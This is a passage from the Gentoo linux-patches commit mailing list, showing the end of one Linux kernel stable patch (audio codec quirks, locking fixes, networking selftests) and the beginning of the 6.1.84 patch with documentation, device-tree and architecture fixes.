++++ b/sound/pci/hda/patch_realtek.c
+@@ -9905,7 +9905,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x10ec, 0x1252, "Intel Reference board", ALC295_FIXUP_CHROME_BOOK),
+ 	SND_PCI_QUIRK(0x10ec, 0x1254, "Intel Reference board", ALC295_FIXUP_CHROME_BOOK),
+ 	SND_PCI_QUIRK(0x10ec, 0x12cc, "Intel Reference board", ALC295_FIXUP_CHROME_BOOK),
+-	SND_PCI_QUIRK(0x10f7, 0x8338, "Panasonic CF-SZ6", ALC269_FIXUP_HEADSET_MODE),
++	SND_PCI_QUIRK(0x10f7, 0x8338, "Panasonic CF-SZ6", ALC269_FIXUP_ASPIRE_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x144d, 0xc109, "Samsung Ativ book 9 (NP900X3G)", ALC269_FIXUP_INV_DMIC),
+ 	SND_PCI_QUIRK(0x144d, 0xc169, "Samsung Notebook 9 Pen (NP930SBE-K01US)", ALC298_FIXUP_SAMSUNG_AMP),
+ 	SND_PCI_QUIRK(0x144d, 0xc176, "Samsung Notebook 9 Pro (NP930MBE-K04US)", ALC298_FIXUP_SAMSUNG_AMP),
+@@ -10121,6 +10121,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1d05, 0x1147, "TongFang GMxTGxx", ALC269_FIXUP_NO_SHUTUP),
+ 	SND_PCI_QUIRK(0x1d05, 0x115c, "TongFang GMxTGxx", ALC269_FIXUP_NO_SHUTUP),
+ 	SND_PCI_QUIRK(0x1d05, 0x121b, "TongFang GMxAGxx", ALC269_FIXUP_NO_SHUTUP),
++	SND_PCI_QUIRK(0x1d05, 0x1387, "TongFang GMxIXxx", ALC2XX_FIXUP_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1d72, 0x1602, "RedmiBook", ALC255_FIXUP_XIAOMI_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1d72, 0x1701, "XiaomiNotebook Pro", ALC298_FIXUP_DELL1_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1d72, 0x1901, "RedmiBook 14", ALC256_FIXUP_ASUS_HEADSET_MIC),
+diff --git a/sound/soc/codecs/rt5682-sdw.c b/sound/soc/codecs/rt5682-sdw.c
+index 868a61c8b0608..7685011a09354 100644
+--- a/sound/soc/codecs/rt5682-sdw.c
++++ b/sound/soc/codecs/rt5682-sdw.c
+@@ -787,12 +787,12 @@ static int __maybe_unused rt5682_dev_resume(struct device *dev)
+ 		return 0;
+ 
+ 	if (!slave->unattach_request) {
++		mutex_lock(&rt5682->disable_irq_lock);
+ 		if (rt5682->disable_irq == true) {
+-			mutex_lock(&rt5682->disable_irq_lock);
+ 			sdw_write_no_pm(slave, SDW_SCP_INTMASK1, SDW_SCP_INT1_IMPL_DEF);
+ 			rt5682->disable_irq = false;
+-			mutex_unlock(&rt5682->disable_irq_lock);
+ 		}
++		mutex_unlock(&rt5682->disable_irq_lock);
+ 		goto regmap_sync;
+ 	}
+ 
+diff --git a/sound/soc/codecs/rt711-sdca-sdw.c b/sound/soc/codecs/rt711-sdca-sdw.c
+index 487d3010ddc19..931dbc68548ee 100644
+--- a/sound/soc/codecs/rt711-sdca-sdw.c
++++ b/sound/soc/codecs/rt711-sdca-sdw.c
+@@ -443,13 +443,13 @@ static int __maybe_unused rt711_sdca_dev_resume(struct device *dev)
+ 		return 0;
+ 
+ 	if (!slave->unattach_request) {
++		mutex_lock(&rt711->disable_irq_lock);
+ 		if (rt711->disable_irq == true) {
+-			mutex_lock(&rt711->disable_irq_lock);
+ 			sdw_write_no_pm(slave, SDW_SCP_SDCA_INTMASK1, SDW_SCP_SDCA_INTMASK_SDCA_0);
+ 			sdw_write_no_pm(slave, SDW_SCP_SDCA_INTMASK2, SDW_SCP_SDCA_INTMASK_SDCA_8);
+ 			rt711->disable_irq = false;
+-			mutex_unlock(&rt711->disable_irq_lock);
+ 		}
++		mutex_unlock(&rt711->disable_irq_lock);
+ 		goto regmap_sync;
+ 	}
+ 
+diff --git a/sound/soc/codecs/rt711-sdw.c b/sound/soc/codecs/rt711-sdw.c
+index 9545b8a7eb192..af7a0ab5669f4 100644
+--- a/sound/soc/codecs/rt711-sdw.c
++++ b/sound/soc/codecs/rt711-sdw.c
+@@ -542,12 +542,12 @@ static int __maybe_unused rt711_dev_resume(struct device *dev)
+ 		return 0;
+ 
+ 	if (!slave->unattach_request) {
++		mutex_lock(&rt711->disable_irq_lock);
+ 		if (rt711->disable_irq == true) {
+-			mutex_lock(&rt711->disable_irq_lock);
+ 			sdw_write_no_pm(slave, SDW_SCP_INTMASK1, SDW_SCP_INT1_IMPL_DEF);
+ 			rt711->disable_irq = false;
+-			mutex_unlock(&rt711->disable_irq_lock);
+ 		}
++		mutex_unlock(&rt711->disable_irq_lock);
+ 		goto regmap_sync;
+ 	}
+ 
+diff --git a/sound/soc/soc-ops.c b/sound/soc/soc-ops.c
+index 2d25748ca7066..b27e89ff6a167 100644
+--- a/sound/soc/soc-ops.c
++++ b/sound/soc/soc-ops.c
+@@ -263,7 +263,7 @@ int snd_soc_get_volsw(struct snd_kcontrol *kcontrol,
+ 	int max = mc->max;
+ 	int min = mc->min;
+ 	int sign_bit = mc->sign_bit;
+-	unsigned int mask = (1 << fls(max)) - 1;
++	unsigned int mask = (1ULL << fls(max)) - 1;
+ 	unsigned int invert = mc->invert;
+ 	int val;
+ 	int ret;
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_connect.sh b/tools/testing/selftests/net/mptcp/mptcp_connect.sh
+index 18c9b00ca058e..dacf4cf2246da 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_connect.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_connect.sh
+@@ -439,6 +439,7 @@ do_transfer()
+ 	local stat_cookierx_last=$(get_mib_counter "${listener_ns}" "TcpExtSyncookiesRecv")
+ 	local stat_csum_err_s=$(get_mib_counter "${listener_ns}" "MPTcpExtDataCsumErr")
+ 	local stat_csum_err_c=$(get_mib_counter "${connector_ns}" "MPTcpExtDataCsumErr")
++	local stat_tcpfb_last_l=$(get_mib_counter "${listener_ns}" "MPTcpExtMPCapableFallbackACK")
+ 
+ 	timeout ${timeout_test} \
+ 		ip netns exec ${listener_ns} \
+@@ -504,6 +505,7 @@ do_transfer()
+ 	local stat_cookietx_now=$(get_mib_counter "${listener_ns}" "TcpExtSyncookiesSent")
+ 	local stat_cookierx_now=$(get_mib_counter "${listener_ns}" "TcpExtSyncookiesRecv")
+ 	local stat_ooo_now=$(get_mib_counter "${listener_ns}" "TcpExtTCPOFOQueue")
++	local stat_tcpfb_now_l=$(get_mib_counter "${listener_ns}" "MPTcpExtMPCapableFallbackACK")
+ 
+ 	expect_synrx=$((stat_synrx_last_l))
+ 	expect_ackrx=$((stat_ackrx_last_l))
+@@ -548,6 +550,11 @@ do_transfer()
+ 		fi
+ 	fi
+ 
++	if [ ${stat_ooo_now} -eq 0 ] && [ ${stat_tcpfb_last_l} -ne ${stat_tcpfb_now_l} ]; then
++		printf "[ FAIL ]\nunexpected fallback to TCP"
++		rets=1
++	fi
++
+ 	if [ $retc -eq 0 ] && [ $rets -eq 0 ]; then
+ 		printf "[ OK ]"
+ 	fi
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index a20dca9d26d68..635a1624b47dc 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -725,7 +725,7 @@ pm_nl_check_endpoint()
+ 			[ -n "$_flags" ]; flags="flags $_flags"
+ 			shift
+ 		elif [ $1 = "dev" ]; then
+-			[ -n "$2" ]; dev="dev $1"
++			[ -n "$2" ]; dev="dev $2"
+ 			shift
+ 		elif [ $1 = "id" ]; then
+ 			_id=$2
+@@ -1771,7 +1771,10 @@ chk_rm_nr()
+ 		# in case of simult flush, the subflow removal count on each side is
+ 		# unreliable
+ 		count=$((count + cnt))
+-		[ "$count" != "$rm_subflow_nr" ] && suffix="$count in [$rm_subflow_nr:$((rm_subflow_nr*2))]"
++		if [ "$count" != "$rm_subflow_nr" ]; then
++			suffix="$count in [$rm_subflow_nr:$((rm_subflow_nr*2))]"
++			extra_msg="$extra_msg simult"
++		fi
+ 		if [ $count -ge "$rm_subflow_nr" ] && \
+ 		   [ "$count" -le "$((rm_subflow_nr *2 ))" ]; then
+ 			echo -n "[ ok ] $suffix"
+diff --git a/tools/testing/selftests/net/reuseaddr_conflict.c b/tools/testing/selftests/net/reuseaddr_conflict.c
+index 7c5b12664b03b..bfb07dc495186 100644
+--- a/tools/testing/selftests/net/reuseaddr_conflict.c
++++ b/tools/testing/selftests/net/reuseaddr_conflict.c
+@@ -109,6 +109,6 @@ int main(void)
+ 	fd1 = open_port(0, 1);
+ 	if (fd1 >= 0)
+ 		error(1, 0, "Was allowed to create an ipv4 reuseport on an already bound non-reuseport socket with no ipv6");
+-	fprintf(stderr, "Success");
++	fprintf(stderr, "Success\n");
+ 	return 0;
+ }
+diff --git a/tools/testing/selftests/net/udpgro_fwd.sh b/tools/testing/selftests/net/udpgro_fwd.sh
+index 9690a5d7ffd7d..9e9b4644e0ea3 100755
+--- a/tools/testing/selftests/net/udpgro_fwd.sh
++++ b/tools/testing/selftests/net/udpgro_fwd.sh
+@@ -239,7 +239,7 @@ for family in 4 6; do
+ 
+ 	create_vxlan_pair
+ 	ip netns exec $NS_DST ethtool -K veth$DST rx-gro-list on
+-	run_test "GRO frag list over UDP tunnel" $OL_NET$DST 1 1
++	run_test "GRO frag list over UDP tunnel" $OL_NET$DST 10 10
+ 	cleanup
+ 
+ 	# use NAT to circumvent GRO FWD check
+@@ -252,13 +252,7 @@ for family in 4 6; do
+ 	# load arp cache before running the test to reduce the amount of
+ 	# stray traffic on top of the UDP tunnel
+ 	ip netns exec $NS_SRC $PING -q -c 1 $OL_NET$DST_NAT >/dev/null
+-	run_test "GRO fwd over UDP tunnel" $OL_NET$DST_NAT 1 1 $OL_NET$DST
+-	cleanup
+-
+-	create_vxlan_pair
+-	run_bench "UDP tunnel fwd perf" $OL_NET$DST
+-	ip netns exec $NS_DST ethtool -K veth$DST rx-udp-gro-forwarding on
+-	run_bench "UDP tunnel GRO fwd perf" $OL_NET$DST
++	run_test "GRO fwd over UDP tunnel" $OL_NET$DST_NAT 10 10 $OL_NET$DST
+ 	cleanup
+ done
+ 


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-04-03 13:54 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-04-03 13:54 UTC (permalink / raw
  To: gentoo-commits

commit:     49f3e7368a76630fdfb6726d27a5553807a9a4a3
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Apr  3 13:53:57 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Apr  3 13:53:57 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=49f3e736

Linux patch 6.1.84

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1083_linux-6.1.84.patch | 11214 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 11218 insertions(+)

diff --git a/0000_README b/0000_README
index 3e406bb1..55224b04 100644
--- a/0000_README
+++ b/0000_README
@@ -375,6 +375,10 @@ Patch:  1082_linux-6.1.83.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.83
 
+Patch:  1083_linux-6.1.84.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.84
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1083_linux-6.1.84.patch b/1083_linux-6.1.84.patch
new file mode 100644
index 00000000..cb20facb
--- /dev/null
+++ b/1083_linux-6.1.84.patch
@@ -0,0 +1,11214 @@
+diff --git a/Documentation/admin-guide/hw-vuln/spectre.rst b/Documentation/admin-guide/hw-vuln/spectre.rst
+index a39bbfe9526b6..32a8893e56177 100644
+--- a/Documentation/admin-guide/hw-vuln/spectre.rst
++++ b/Documentation/admin-guide/hw-vuln/spectre.rst
+@@ -484,11 +484,14 @@ Spectre variant 2
+ 
+    Systems which support enhanced IBRS (eIBRS) enable IBRS protection once at
+    boot, by setting the IBRS bit, and they're automatically protected against
+-   Spectre v2 variant attacks, including cross-thread branch target injections
+-   on SMT systems (STIBP). In other words, eIBRS enables STIBP too.
++   Spectre v2 variant attacks.
+ 
+-   Legacy IBRS systems clear the IBRS bit on exit to userspace and
+-   therefore explicitly enable STIBP for that
++   On Intel's enhanced IBRS systems, this includes cross-thread branch target
++   injections on SMT systems (STIBP). In other words, Intel eIBRS enables
++   STIBP, too.
++
++   AMD Automatic IBRS does not protect userspace, and Legacy IBRS systems clear
++   the IBRS bit on exit to userspace; therefore both explicitly enable STIBP.
+ 
+    The retpoline mitigation is turned on by default on vulnerable
+    CPUs. It can be forced on or off by the administrator
+@@ -621,9 +624,9 @@ kernel command line.
+                 retpoline,generic       Retpolines
+                 retpoline,lfence        LFENCE; indirect branch
+                 retpoline,amd           alias for retpoline,lfence
+-                eibrs                   enhanced IBRS
+-                eibrs,retpoline         enhanced IBRS + Retpolines
+-                eibrs,lfence            enhanced IBRS + LFENCE
++                eibrs                   Enhanced/Auto IBRS
++                eibrs,retpoline         Enhanced/Auto IBRS + Retpolines
++                eibrs,lfence            Enhanced/Auto IBRS + LFENCE
+                 ibrs                    use IBRS to protect kernel
+ 
+ 		Not specifying this option is equivalent to
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index 2dfe75104e7de..88dffaf8f0a99 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -3206,9 +3206,7 @@
+ 
+ 	mem_encrypt=	[X86-64] AMD Secure Memory Encryption (SME) control
+ 			Valid arguments: on, off
+-			Default (depends on kernel configuration option):
+-			  on  (CONFIG_AMD_MEM_ENCRYPT_ACTIVE_BY_DEFAULT=y)
+-			  off (CONFIG_AMD_MEM_ENCRYPT_ACTIVE_BY_DEFAULT=n)
++			Default: off
+ 			mem_encrypt=on:		Activate SME
+ 			mem_encrypt=off:	Do not activate SME
+ 
+@@ -5765,9 +5763,9 @@
+ 			retpoline,generic - Retpolines
+ 			retpoline,lfence  - LFENCE; indirect branch
+ 			retpoline,amd     - alias for retpoline,lfence
+-			eibrs		  - enhanced IBRS
+-			eibrs,retpoline   - enhanced IBRS + Retpolines
+-			eibrs,lfence      - enhanced IBRS + LFENCE
++			eibrs		  - Enhanced/Auto IBRS
++			eibrs,retpoline   - Enhanced/Auto IBRS + Retpolines
++			eibrs,lfence      - Enhanced/Auto IBRS + LFENCE
+ 			ibrs		  - use IBRS to protect kernel
+ 
+ 			Not specifying this option is equivalent to
+diff --git a/Documentation/userspace-api/media/mediactl/media-types.rst b/Documentation/userspace-api/media/mediactl/media-types.rst
+index 0ffeece1e0c8e..6332e8395263b 100644
+--- a/Documentation/userspace-api/media/mediactl/media-types.rst
++++ b/Documentation/userspace-api/media/mediactl/media-types.rst
+@@ -375,12 +375,11 @@ Types and flags used to represent the media graph elements
+ 	  are origins of links.
+ 
+     *  -  ``MEDIA_PAD_FL_MUST_CONNECT``
+-       -  If this flag is set and the pad is linked to any other pad, then
+-	  at least one of those links must be enabled for the entity to be
+-	  able to stream. There could be temporary reasons (e.g. device
+-	  configuration dependent) for the pad to need enabled links even
+-	  when this flag isn't set; the absence of the flag doesn't imply
+-	  there is none.
++       -  If this flag is set, then for this pad to be able to stream, it must
++	  be connected by at least one enabled link. There could be temporary
++	  reasons (e.g. device configuration dependent) for the pad to need
++	  enabled links even when this flag isn't set; the absence of the flag
++	  doesn't imply there is none.
+ 
+ 
+ One and only one of ``MEDIA_PAD_FL_SINK`` and ``MEDIA_PAD_FL_SOURCE``
+diff --git a/Documentation/x86/amd-memory-encryption.rst b/Documentation/x86/amd-memory-encryption.rst
+index 934310ce72582..bace87cc9ca2c 100644
+--- a/Documentation/x86/amd-memory-encryption.rst
++++ b/Documentation/x86/amd-memory-encryption.rst
+@@ -87,14 +87,14 @@ The state of SME in the Linux kernel can be documented as follows:
+ 	  kernel is non-zero).
+ 
+ SME can also be enabled and activated in the BIOS. If SME is enabled and
+-activated in the BIOS, then all memory accesses will be encrypted and it will
+-not be necessary to activate the Linux memory encryption support.  If the BIOS
+-merely enables SME (sets bit 23 of the MSR_AMD64_SYSCFG), then Linux can activate
+-memory encryption by default (CONFIG_AMD_MEM_ENCRYPT_ACTIVE_BY_DEFAULT=y) or
+-by supplying mem_encrypt=on on the kernel command line.  However, if BIOS does
+-not enable SME, then Linux will not be able to activate memory encryption, even
+-if configured to do so by default or the mem_encrypt=on command line parameter
+-is specified.
++activated in the BIOS, then all memory accesses will be encrypted and it
++will not be necessary to activate the Linux memory encryption support.
++
++If the BIOS merely enables SME (sets bit 23 of the MSR_AMD64_SYSCFG),
++then memory encryption can be enabled by supplying mem_encrypt=on on the
++kernel command line.  However, if BIOS does not enable SME, then Linux
++will not be able to activate memory encryption, even if configured to do
++so by default or the mem_encrypt=on command line parameter is specified.
+ 
+ Secure Nested Paging (SNP)
+ ==========================
+diff --git a/Makefile b/Makefile
+index 38657b3dda2cd..0e33150db2bfc 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 83
++SUBLEVEL = 84
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/mmp2-brownstone.dts b/arch/arm/boot/dts/mmp2-brownstone.dts
+index 04f1ae1382e7a..bc64348b82185 100644
+--- a/arch/arm/boot/dts/mmp2-brownstone.dts
++++ b/arch/arm/boot/dts/mmp2-brownstone.dts
+@@ -28,7 +28,7 @@ &uart3 {
+ &twsi1 {
+ 	status = "okay";
+ 	pmic: max8925@3c {
+-		compatible = "maxium,max8925";
++		compatible = "maxim,max8925";
+ 		reg = <0x3c>;
+ 		interrupts = <1>;
+ 		interrupt-parent = <&intcmux4>;
+diff --git a/arch/arm64/boot/dts/qcom/sc7280.dtsi b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+index 04106d7254000..b5cd24d59ad9a 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+@@ -2028,8 +2028,16 @@ pcie1: pci@1c08000 {
+ 			ranges = <0x01000000 0x0 0x00000000 0x0 0x40200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x40300000 0x0 0x40300000 0x0 0x1fd00000>;
+ 
+-			interrupts = <GIC_SPI 307 IRQ_TYPE_LEVEL_HIGH>;
+-			interrupt-names = "msi";
++			interrupts = <GIC_SPI 307 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 308 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 309 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 312 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 313 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 314 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 374 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 375 IRQ_TYPE_LEVEL_HIGH>;
++			interrupt-names = "msi0", "msi1", "msi2", "msi3",
++					  "msi4", "msi5", "msi6", "msi7";
+ 			#interrupt-cells = <1>;
+ 			interrupt-map-mask = <0 0 0 0x7>;
+ 			interrupt-map = <0 0 0 1 &intc 0 0 0 434 IRQ_TYPE_LEVEL_HIGH>,
+diff --git a/arch/hexagon/kernel/vmlinux.lds.S b/arch/hexagon/kernel/vmlinux.lds.S
+index 57465bff1fe49..df7f349c8d4f3 100644
+--- a/arch/hexagon/kernel/vmlinux.lds.S
++++ b/arch/hexagon/kernel/vmlinux.lds.S
+@@ -64,6 +64,7 @@ SECTIONS
+ 	STABS_DEBUG
+ 	DWARF_DEBUG
+ 	ELF_DETAILS
++	.hexagon.attributes 0 : { *(.hexagon.attributes) }
+ 
+ 	DISCARDS
+ }
+diff --git a/arch/loongarch/include/asm/io.h b/arch/loongarch/include/asm/io.h
+index 402a7d9e3a53e..427d147f30d7f 100644
+--- a/arch/loongarch/include/asm/io.h
++++ b/arch/loongarch/include/asm/io.h
+@@ -72,6 +72,8 @@ extern void __memcpy_fromio(void *to, const volatile void __iomem *from, size_t
+ #define memcpy_fromio(a, c, l) __memcpy_fromio((a), (c), (l))
+ #define memcpy_toio(c, a, l)   __memcpy_toio((c), (a), (l))
+ 
++#define __io_aw() mmiowb()
++
+ #include <asm-generic/io.h>
+ 
+ #define ARCH_HAS_VALID_PHYS_ADDR_RANGE
+diff --git a/arch/loongarch/include/asm/percpu.h b/arch/loongarch/include/asm/percpu.h
+index 302f0e33975a2..c90c560941685 100644
+--- a/arch/loongarch/include/asm/percpu.h
++++ b/arch/loongarch/include/asm/percpu.h
+@@ -25,7 +25,12 @@ static inline void set_my_cpu_offset(unsigned long off)
+ 	__my_cpu_offset = off;
+ 	csr_write64(off, PERCPU_BASE_KS);
+ }
+-#define __my_cpu_offset __my_cpu_offset
++
++#define __my_cpu_offset					\
++({							\
++	__asm__ __volatile__("":"+r"(__my_cpu_offset));	\
++	__my_cpu_offset;				\
++})
+ 
+ #define PERCPU_OP(op, asm_op, c_op)					\
+ static __always_inline unsigned long __percpu_##op(void *ptr,		\
+diff --git a/arch/parisc/include/asm/assembly.h b/arch/parisc/include/asm/assembly.h
+index 5937d5edaba1e..000a28e1c5e8d 100644
+--- a/arch/parisc/include/asm/assembly.h
++++ b/arch/parisc/include/asm/assembly.h
+@@ -97,26 +97,28 @@
+ 	 * version takes two arguments: a src and destination register.
+ 	 * However, the source and destination registers can not be
+ 	 * the same register.
++	 *
++	 * We use add,l to avoid clobbering the C/B bits in the PSW.
+ 	 */
+ 
+ 	.macro  tophys  grvirt, grphys
+-	ldil    L%(__PAGE_OFFSET), \grphys
+-	sub     \grvirt, \grphys, \grphys
++	ldil    L%(-__PAGE_OFFSET), \grphys
++	addl    \grvirt, \grphys, \grphys
+ 	.endm
+-	
++
+ 	.macro  tovirt  grphys, grvirt
+ 	ldil    L%(__PAGE_OFFSET), \grvirt
+-	add     \grphys, \grvirt, \grvirt
++	addl    \grphys, \grvirt, \grvirt
+ 	.endm
+ 
+ 	.macro  tophys_r1  gr
+-	ldil    L%(__PAGE_OFFSET), %r1
+-	sub     \gr, %r1, \gr
++	ldil    L%(-__PAGE_OFFSET), %r1
++	addl    \gr, %r1, \gr
+ 	.endm
+-	
++
+ 	.macro  tovirt_r1  gr
+ 	ldil    L%(__PAGE_OFFSET), %r1
+-	add     \gr, %r1, \gr
++	addl    \gr, %r1, \gr
+ 	.endm
+ 
+ 	.macro delay value
+diff --git a/arch/parisc/include/asm/checksum.h b/arch/parisc/include/asm/checksum.h
+index 3c43baca7b397..2aceebcd695c8 100644
+--- a/arch/parisc/include/asm/checksum.h
++++ b/arch/parisc/include/asm/checksum.h
+@@ -40,7 +40,7 @@ static inline __sum16 ip_fast_csum(const void *iph, unsigned int ihl)
+ "	addc		%0, %5, %0\n"
+ "	addc		%0, %3, %0\n"
+ "1:	ldws,ma		4(%1), %3\n"
+-"	addib,<		0, %2, 1b\n"
++"	addib,>		-1, %2, 1b\n"
+ "	addc		%0, %3, %0\n"
+ "\n"
+ "	extru		%0, 31, 16, %4\n"
+@@ -126,6 +126,7 @@ static __inline__ __sum16 csum_ipv6_magic(const struct in6_addr *saddr,
+ 	** Try to keep 4 registers with "live" values ahead of the ALU.
+ 	*/
+ 
++"	depdi		0, 31, 32, %0\n"/* clear upper half of incoming checksum */
+ "	ldd,ma		8(%1), %4\n"	/* get 1st saddr word */
+ "	ldd,ma		8(%2), %5\n"	/* get 1st daddr word */
+ "	add		%4, %0, %0\n"
+@@ -137,8 +138,8 @@ static __inline__ __sum16 csum_ipv6_magic(const struct in6_addr *saddr,
+ "	add,dc		%3, %0, %0\n"  /* fold in proto+len | carry bit */
+ "	extrd,u		%0, 31, 32, %4\n"/* copy upper half down */
+ "	depdi		0, 31, 32, %0\n"/* clear upper half */
+-"	add		%4, %0, %0\n"	/* fold into 32-bits */
+-"	addc		0, %0, %0\n"	/* add carry */
++"	add,dc		%4, %0, %0\n"	/* fold into 32-bits, plus carry */
++"	addc		0, %0, %0\n"	/* add final carry */
+ 
+ #else
+ 
+@@ -163,7 +164,8 @@ static __inline__ __sum16 csum_ipv6_magic(const struct in6_addr *saddr,
+ "	ldw,ma		4(%2), %7\n"	/* 4th daddr */
+ "	addc		%6, %0, %0\n"
+ "	addc		%7, %0, %0\n"
+-"	addc		%3, %0, %0\n"	/* fold in proto+len, catch carry */
++"	addc		%3, %0, %0\n"	/* fold in proto+len */
++"	addc		0, %0, %0\n"	/* add carry */
+ 
+ #endif
+ 	: "=r" (sum), "=r" (saddr), "=r" (daddr), "=r" (len),
+diff --git a/arch/parisc/kernel/unaligned.c b/arch/parisc/kernel/unaligned.c
+index 8a8e7d7224a26..782ee05e20889 100644
+--- a/arch/parisc/kernel/unaligned.c
++++ b/arch/parisc/kernel/unaligned.c
+@@ -167,6 +167,7 @@ static int emulate_ldw(struct pt_regs *regs, int toreg, int flop)
+ static int emulate_ldd(struct pt_regs *regs, int toreg, int flop)
+ {
+ 	unsigned long saddr = regs->ior;
++	unsigned long shift, temp1;
+ 	__u64 val = 0;
+ 	ASM_EXCEPTIONTABLE_VAR(ret);
+ 
+@@ -178,25 +179,22 @@ static int emulate_ldd(struct pt_regs *regs, int toreg, int flop)
+ 
+ #ifdef CONFIG_64BIT
+ 	__asm__ __volatile__  (
+-"	depd,z	%3,60,3,%%r19\n"		/* r19=(ofs&7)*8 */
+-"	mtsp	%4, %%sr1\n"
+-"	depd	%%r0,63,3,%3\n"
+-"1:	ldd	0(%%sr1,%3),%0\n"
+-"2:	ldd	8(%%sr1,%3),%%r20\n"
+-"	subi	64,%%r19,%%r19\n"
+-"	mtsar	%%r19\n"
+-"	shrpd	%0,%%r20,%%sar,%0\n"
++"	depd,z	%2,60,3,%3\n"		/* shift=(ofs&7)*8 */
++"	mtsp	%5, %%sr1\n"
++"	depd	%%r0,63,3,%2\n"
++"1:	ldd	0(%%sr1,%2),%0\n"
++"2:	ldd	8(%%sr1,%2),%4\n"
++"	subi	64,%3,%3\n"
++"	mtsar	%3\n"
++"	shrpd	%0,%4,%%sar,%0\n"
+ "3:	\n"
+ 	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 3b, "%1")
+ 	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 3b, "%1")
+-	: "=r" (val), "+r" (ret)
+-	: "0" (val), "r" (saddr), "r" (regs->isr)
+-	: "r19", "r20" );
++	: "+r" (val), "+r" (ret), "+r" (saddr), "=&r" (shift), "=&r" (temp1)
++	: "r" (regs->isr) );
+ #else
+-    {
+-	unsigned long shift, temp1;
+ 	__asm__ __volatile__  (
+-"	zdep	%2,29,2,%3\n"		/* r19=(ofs&3)*8 */
++"	zdep	%2,29,2,%3\n"		/* shift=(ofs&3)*8 */
+ "	mtsp	%5, %%sr1\n"
+ "	dep	%%r0,31,2,%2\n"
+ "1:	ldw	0(%%sr1,%2),%0\n"
+@@ -212,7 +210,6 @@ static int emulate_ldd(struct pt_regs *regs, int toreg, int flop)
+ 	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(3b, 4b, "%1")
+ 	: "+r" (val), "+r" (ret), "+r" (saddr), "=&r" (shift), "=&r" (temp1)
+ 	: "r" (regs->isr) );
+-    }
+ #endif
+ 
+ 	DPRINTF("val = 0x%llx\n", val);
+diff --git a/arch/powerpc/include/asm/reg_fsl_emb.h b/arch/powerpc/include/asm/reg_fsl_emb.h
+index a21f529c43d96..8359c06d92d9f 100644
+--- a/arch/powerpc/include/asm/reg_fsl_emb.h
++++ b/arch/powerpc/include/asm/reg_fsl_emb.h
+@@ -12,9 +12,16 @@
+ #ifndef __ASSEMBLY__
+ /* Performance Monitor Registers */
+ #define mfpmr(rn)	({unsigned int rval; \
+-			asm volatile("mfpmr %0," __stringify(rn) \
++			asm volatile(".machine push; " \
++				     ".machine e300; " \
++				     "mfpmr %0," __stringify(rn) ";" \
++				     ".machine pop; " \
+ 				     : "=r" (rval)); rval;})
+-#define mtpmr(rn, v)	asm volatile("mtpmr " __stringify(rn) ",%0" : : "r" (v))
++#define mtpmr(rn, v)	asm volatile(".machine push; " \
++				     ".machine e300; " \
++				     "mtpmr " __stringify(rn) ",%0; " \
++				     ".machine pop; " \
++				     : : "r" (v))
+ #endif /* __ASSEMBLY__ */
+ 
+ /* Freescale Book E Performance Monitor APU Registers */
+diff --git a/arch/powerpc/kernel/prom.c b/arch/powerpc/kernel/prom.c
+index 8537c354c560b..9531ab90feb8a 100644
+--- a/arch/powerpc/kernel/prom.c
++++ b/arch/powerpc/kernel/prom.c
+@@ -369,6 +369,18 @@ static int __init early_init_dt_scan_cpus(unsigned long node,
+ 	if (IS_ENABLED(CONFIG_PPC64))
+ 		boot_cpu_hwid = be32_to_cpu(intserv[found_thread]);
+ 
++	if (nr_cpu_ids % nthreads != 0) {
++		set_nr_cpu_ids(ALIGN(nr_cpu_ids, nthreads));
